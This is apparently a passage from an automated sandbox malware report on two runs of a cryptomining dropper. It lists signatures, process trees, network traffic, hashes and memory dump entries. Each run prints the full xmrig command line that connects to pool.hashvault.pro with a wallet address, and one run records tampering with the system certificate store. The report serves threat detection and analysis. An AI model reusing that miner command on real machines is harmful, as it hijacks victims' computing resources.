| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2428 wrote to memory of 4948 | N/A | C:\Users\Admin\AppData\Local\Temp\main.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
| PID 2428 wrote to memory of 4948 | N/A | C:\Users\Admin\AppData\Local\Temp\main.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\main.exe
"C:\Users\Admin\AppData\Local\Temp\main.exe"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | 97.17.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 74.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 237.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.197.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pool.hashvault.pro | udp |
| DE | 45.76.89.70:80 | pool.hashvault.pro | tcp |
| US | 8.8.8.8:53 | 70.89.76.45.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 183.142.211.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 50.23.12.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 56.126.166.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 142.53.16.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 35.56.20.217.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 203.107.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.179.89.13.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
| MD5 | e2fe87cc2c7dab8ca6516620dccd1381 |
| SHA1 | f714ec0448325435103519452610cf7aadf8bbba |
| SHA256 | d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4 |
| SHA512 | 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6 |
memory/4948-16-0x000001E421C90000-0x000001E421CB0000-memory.dmp
memory/4948-17-0x000001E4B5900000-0x000001E4B5920000-memory.dmp
memory/4948-18-0x00007FF67B920000-0x00007FF67C423000-memory.dmp
memory/4948-21-0x000001E4B5F50000-0x000001E4B5F70000-memory.dmp
memory/4948-20-0x000001E4B5F70000-0x000001E4B5F90000-memory.dmp
memory/4948-19-0x00007FF67B920000-0x00007FF67C423000-memory.dmp
memory/4948-22-0x00007FF67B920000-0x00007FF67C423000-memory.dmp
memory/4948-23-0x00007FF67B920000-0x00007FF67C423000-memory.dmp
memory/4948-24-0x000001E4B5F70000-0x000001E4B5F90000-memory.dmp
memory/4948-25-0x000001E4B5F50000-0x000001E4B5F70000-memory.dmp
memory/4948-26-0x00007FF67B920000-0x00007FF67C423000-memory.dmp
memory/4948-27-0x00007FF67B920000-0x00007FF67C423000-memory.dmp
memory/4948-28-0x00007FF67B920000-0x00007FF67C423000-memory.dmp
memory/4948-29-0x00007FF67B920000-0x00007FF67C423000-memory.dmp
memory/4948-30-0x00007FF67B920000-0x00007FF67C423000-memory.dmp
memory/4948-31-0x00007FF67B920000-0x00007FF67C423000-memory.dmp
memory/4948-32-0x00007FF67B920000-0x00007FF67C423000-memory.dmp
memory/4948-33-0x00007FF67B920000-0x00007FF67C423000-memory.dmp
memory/4948-34-0x00007FF67B920000-0x00007FF67C423000-memory.dmp
memory/4948-35-0x00007FF67B920000-0x00007FF67C423000-memory.dmp
memory/4948-36-0x00007FF67B920000-0x00007FF67C423000-memory.dmp
memory/4948-37-0x00007FF67B920000-0x00007FF67C423000-memory.dmp
memory/4948-38-0x00007FF67B920000-0x00007FF67C423000-memory.dmp
memory/4948-39-0x00007FF67B920000-0x00007FF67C423000-memory.dmp
memory/4948-40-0x00007FF67B920000-0x00007FF67C423000-memory.dmp
memory/4948-41-0x00007FF67B920000-0x00007FF67C423000-memory.dmp
memory/4948-42-0x00007FF67B920000-0x00007FF67C423000-memory.dmp
memory/4948-43-0x00007FF67B920000-0x00007FF67C423000-memory.dmp
memory/4948-44-0x00007FF67B920000-0x00007FF67C423000-memory.dmp
memory/4948-45-0x00007FF67B920000-0x00007FF67C423000-memory.dmp
memory/4948-46-0x00007FF67B920000-0x00007FF67C423000-memory.dmp
memory/4948-47-0x00007FF67B920000-0x00007FF67C423000-memory.dmp
memory/4948-48-0x00007FF67B920000-0x00007FF67C423000-memory.dmp
memory/4948-49-0x00007FF67B920000-0x00007FF67C423000-memory.dmp
memory/4948-50-0x00007FF67B920000-0x00007FF67C423000-memory.dmp
memory/4948-51-0x00007FF67B920000-0x00007FF67C423000-memory.dmp
memory/4948-52-0x00007FF67B920000-0x00007FF67C423000-memory.dmp
memory/4948-53-0x00007FF67B920000-0x00007FF67C423000-memory.dmp
memory/4948-54-0x00007FF67B920000-0x00007FF67C423000-memory.dmp
memory/4948-55-0x00007FF67B920000-0x00007FF67C423000-memory.dmp
memory/4948-56-0x00007FF67B920000-0x00007FF67C423000-memory.dmp
memory/4948-57-0x00007FF67B920000-0x00007FF67C423000-memory.dmp
memory/4948-58-0x00007FF67B920000-0x00007FF67C423000-memory.dmp
memory/4948-59-0x00007FF67B920000-0x00007FF67C423000-memory.dmp
memory/4948-60-0x00007FF67B920000-0x00007FF67C423000-memory.dmp
memory/4948-61-0x00007FF67B920000-0x00007FF67C423000-memory.dmp
memory/4948-62-0x00007FF67B920000-0x00007FF67C423000-memory.dmp
memory/4948-63-0x00007FF67B920000-0x00007FF67C423000-memory.dmp
memory/4948-64-0x00007FF67B920000-0x00007FF67C423000-memory.dmp
memory/4948-65-0x00007FF67B920000-0x00007FF67C423000-memory.dmp
memory/4948-66-0x00007FF67B920000-0x00007FF67C423000-memory.dmp
memory/4948-67-0x00007FF67B920000-0x00007FF67C423000-memory.dmp
memory/4948-68-0x00007FF67B920000-0x00007FF67C423000-memory.dmp
memory/4948-69-0x00007FF67B920000-0x00007FF67C423000-memory.dmp
memory/4948-70-0x00007FF67B920000-0x00007FF67C423000-memory.dmp
memory/4948-71-0x00007FF67B920000-0x00007FF67C423000-memory.dmp
memory/4948-72-0x00007FF67B920000-0x00007FF67C423000-memory.dmp
memory/4948-73-0x00007FF67B920000-0x00007FF67C423000-memory.dmp
memory/4948-74-0x00007FF67B920000-0x00007FF67C423000-memory.dmp
memory/4948-75-0x00007FF67B920000-0x00007FF67C423000-memory.dmp
memory/4948-76-0x00007FF67B920000-0x00007FF67C423000-memory.dmp
memory/4948-77-0x00007FF67B920000-0x00007FF67C423000-memory.dmp
memory/4948-78-0x00007FF67B920000-0x00007FF67C423000-memory.dmp
memory/4948-79-0x00007FF67B920000-0x00007FF67C423000-memory.dmp
memory/4948-80-0x00007FF67B920000-0x00007FF67C423000-memory.dmp
memory/4948-81-0x00007FF67B920000-0x00007FF67C423000-memory.dmp
memory/4948-82-0x00007FF67B920000-0x00007FF67C423000-memory.dmp
memory/4948-83-0x00007FF67B920000-0x00007FF67C423000-memory.dmp
memory/4948-84-0x00007FF67B920000-0x00007FF67C423000-memory.dmp
Analysis: behavioral6
Detonation Overview
Submitted
2024-05-22 18:52
Reported
2024-05-22 20:03
Platform
win10v2004-20240508-en
Max time kernel
1790s
Max time network
1796s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
xmrig
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = … | C:\Users\Admin\AppData\Local\Temp\main - Copy (4) - Copy.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = … | C:\Users\Admin\AppData\Local\Temp\main - Copy (4) - Copy.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 | C:\Users\Admin\AppData\Local\Temp\main - Copy (4) - Copy.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 220 wrote to memory of 752 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (4) - Copy.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
| PID 220 wrote to memory of 752 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (4) - Copy.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\main - Copy (4) - Copy.exe
"C:\Users\Admin\AppData\Local\Temp\main - Copy (4) - Copy.exe"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 154.239.44.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 133.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pool.hashvault.pro | udp |
| DE | 95.179.241.203:80 | pool.hashvault.pro | tcp |
| US | 8.8.8.8:53 | 149.220.183.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 203.241.179.95.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 183.59.114.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 171.39.242.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 209.80.50.20.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
| MD5 | e2fe87cc2c7dab8ca6516620dccd1381 |
| SHA1 | f714ec0448325435103519452610cf7aadf8bbba |
| SHA256 | d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4 |
| SHA512 | 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6 |
memory/752-16-0x00000206F7210000-0x00000206F7230000-memory.dmp
memory/752-17-0x00000206F8B10000-0x00000206F8B30000-memory.dmp
memory/752-18-0x00007FF7D98C0000-0x00007FF7DA3C3000-memory.dmp
memory/752-19-0x00000206F8B30000-0x00000206F8B50000-memory.dmp
memory/752-20-0x00000206F8B50000-0x00000206F8B70000-memory.dmp
memory/752-21-0x00007FF7D98C0000-0x00007FF7DA3C3000-memory.dmp
memory/752-22-0x00007FF7D98C0000-0x00007FF7DA3C3000-memory.dmp
memory/752-25-0x00000206F8B50000-0x00000206F8B70000-memory.dmp
memory/752-24-0x00000206F8B30000-0x00000206F8B50000-memory.dmp
memory/752-23-0x00007FF7D98C0000-0x00007FF7DA3C3000-memory.dmp
memory/752-26-0x00007FF7D98C0000-0x00007FF7DA3C3000-memory.dmp
memory/752-27-0x00007FF7D98C0000-0x00007FF7DA3C3000-memory.dmp
memory/752-28-0x00007FF7D98C0000-0x00007FF7DA3C3000-memory.dmp
memory/752-29-0x00007FF7D98C0000-0x00007FF7DA3C3000-memory.dmp
memory/752-30-0x00007FF7D98C0000-0x00007FF7DA3C3000-memory.dmp
memory/752-31-0x00007FF7D98C0000-0x00007FF7DA3C3000-memory.dmp
memory/752-32-0x00007FF7D98C0000-0x00007FF7DA3C3000-memory.dmp
memory/752-33-0x00007FF7D98C0000-0x00007FF7DA3C3000-memory.dmp
memory/752-34-0x00007FF7D98C0000-0x00007FF7DA3C3000-memory.dmp
memory/752-35-0x00007FF7D98C0000-0x00007FF7DA3C3000-memory.dmp
memory/752-36-0x00007FF7D98C0000-0x00007FF7DA3C3000-memory.dmp
memory/752-37-0x00007FF7D98C0000-0x00007FF7DA3C3000-memory.dmp
memory/752-38-0x00007FF7D98C0000-0x00007FF7DA3C3000-memory.dmp
memory/752-39-0x00007FF7D98C0000-0x00007FF7DA3C3000-memory.dmp
memory/752-40-0x00007FF7D98C0000-0x00007FF7DA3C3000-memory.dmp
memory/752-41-0x00007FF7D98C0000-0x00007FF7DA3C3000-memory.dmp
memory/752-42-0x00007FF7D98C0000-0x00007FF7DA3C3000-memory.dmp
memory/752-43-0x00007FF7D98C0000-0x00007FF7DA3C3000-memory.dmp
memory/752-44-0x00007FF7D98C0000-0x00007FF7DA3C3000-memory.dmp
memory/752-45-0x00007FF7D98C0000-0x00007FF7DA3C3000-memory.dmp
memory/752-46-0x00007FF7D98C0000-0x00007FF7DA3C3000-memory.dmp
memory/752-47-0x00007FF7D98C0000-0x00007FF7DA3C3000-memory.dmp
memory/752-48-0x00007FF7D98C0000-0x00007FF7DA3C3000-memory.dmp
memory/752-49-0x00007FF7D98C0000-0x00007FF7DA3C3000-memory.dmp
memory/752-50-0x00007FF7D98C0000-0x00007FF7DA3C3000-memory.dmp
memory/752-51-0x00007FF7D98C0000-0x00007FF7DA3C3000-memory.dmp
memory/752-52-0x00007FF7D98C0000-0x00007FF7DA3C3000-memory.dmp
memory/752-53-0x00007FF7D98C0000-0x00007FF7DA3C3000-memory.dmp
memory/752-54-0x00007FF7D98C0000-0x00007FF7DA3C3000-memory.dmp
memory/752-55-0x00007FF7D98C0000-0x00007FF7DA3C3000-memory.dmp
memory/752-56-0x00007FF7D98C0000-0x00007FF7DA3C3000-memory.dmp
memory/752-57-0x00007FF7D98C0000-0x00007FF7DA3C3000-memory.dmp
memory/752-58-0x00007FF7D98C0000-0x00007FF7DA3C3000-memory.dmp
memory/752-59-0x00007FF7D98C0000-0x00007FF7DA3C3000-memory.dmp
memory/752-60-0x00007FF7D98C0000-0x00007FF7DA3C3000-memory.dmp
memory/752-61-0x00007FF7D98C0000-0x00007FF7DA3C3000-memory.dmp
memory/752-62-0x00007FF7D98C0000-0x00007FF7DA3C3000-memory.dmp
memory/752-63-0x00007FF7D98C0000-0x00007FF7DA3C3000-memory.dmp
memory/752-64-0x00007FF7D98C0000-0x00007FF7DA3C3000-memory.dmp
memory/752-65-0x00007FF7D98C0000-0x00007FF7DA3C3000-memory.dmp
memory/752-66-0x00007FF7D98C0000-0x00007FF7DA3C3000-memory.dmp
memory/752-67-0x00007FF7D98C0000-0x00007FF7DA3C3000-memory.dmp
memory/752-68-0x00007FF7D98C0000-0x00007FF7DA3C3000-memory.dmp
memory/752-69-0x00007FF7D98C0000-0x00007FF7DA3C3000-memory.dmp
memory/752-70-0x00007FF7D98C0000-0x00007FF7DA3C3000-memory.dmp
memory/752-71-0x00007FF7D98C0000-0x00007FF7DA3C3000-memory.dmp
memory/752-72-0x00007FF7D98C0000-0x00007FF7DA3C3000-memory.dmp
memory/752-73-0x00007FF7D98C0000-0x00007FF7DA3C3000-memory.dmp
memory/752-74-0x00007FF7D98C0000-0x00007FF7DA3C3000-memory.dmp
memory/752-75-0x00007FF7D98C0000-0x00007FF7DA3C3000-memory.dmp
memory/752-76-0x00007FF7D98C0000-0x00007FF7DA3C3000-memory.dmp
memory/752-77-0x00007FF7D98C0000-0x00007FF7DA3C3000-memory.dmp
memory/752-78-0x00007FF7D98C0000-0x00007FF7DA3C3000-memory.dmp
memory/752-79-0x00007FF7D98C0000-0x00007FF7DA3C3000-memory.dmp
memory/752-80-0x00007FF7D98C0000-0x00007FF7DA3C3000-memory.dmp
memory/752-81-0x00007FF7D98C0000-0x00007FF7DA3C3000-memory.dmp
memory/752-82-0x00007FF7D98C0000-0x00007FF7DA3C3000-memory.dmp
memory/752-83-0x00007FF7D98C0000-0x00007FF7DA3C3000-memory.dmp
memory/752-84-0x00007FF7D98C0000-0x00007FF7DA3C3000-memory.dmp